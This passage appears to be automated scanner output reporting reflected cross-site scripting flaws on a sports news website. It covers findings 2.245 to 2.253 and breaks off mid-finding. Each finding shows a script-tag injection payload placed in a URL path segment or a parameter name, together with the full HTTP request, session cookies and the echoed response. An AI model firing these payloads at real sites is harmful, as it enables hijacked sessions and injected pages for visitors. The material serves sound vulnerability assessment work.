Connection: Transfer-Encoding
Content-Length: 51718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/1022d00"><script>alert(1)</script>3b9a8daff6a/Text-to-Win-a-Flip-Sweepstakes/landing.html">
...[SNIP]...

2.245. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 783a8"><script>alert(1)</script>753733aaae1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/07/10/Text-to-Win-a-Flip-Sweepstakes783a8"><script>alert(1)</script>753733aaae1/landing.html">
...[SNIP]...

2.246. http://www.csncalifornia.com/12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696bb"><script>alert(1)</script>0b37ba3c0d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/07/10/Text-to-Win-a-Flip-Sweepstakes/landing.html?696bb"><script>alert(1)</script>0b37ba3c0d4=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51552

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="696bb"><script>alert(1)</script>0b37ba3c0d4" id = "696bb">
...[SNIP]...

2.247. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85497"><script>alert(1)</script>d032dfcbdb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1285497"><script>alert(1)</script>d032dfcbdb4/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.248. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><script>alert(1)</script>b77f2c3bf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15a641b"><script>alert(1)</script>b77f2c3bf5a/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.249. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ea7"><script>alert(1)</script>f3511ff7f64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/1040ea7"><script>alert(1)</script>f3511ff7f64/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html">
...[SNIP]...

2.250. http://www.csncalifornia.com/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encru/landing_word_streets.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36ea"><script>alert(1)</script>b1b0878059d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15/10/Report-Aubrey-Huff-wore-rhinestone-encrue36ea"><script>alert(1)</script>b1b0878059d/landing_word_streets.html">
...[SNIP]...

2.251. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81447"><script>alert(1)</script>a1306ad1405 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55333

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/1281447"><script>alert(1)</script>a1306ad1405/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.252. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 602af"><script>alert(1)</script>146ab9d7a83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/15602af"><script>alert(1)</script>146ab9d7a83/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html">
...[SNIP]...

2.253. http://www.csncalifornia.com/12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/15/10/Warriors-Lin-likely-headed-to-D-League/landing_warriors.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c0e"><script>alert(1)</script>36e3d581f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.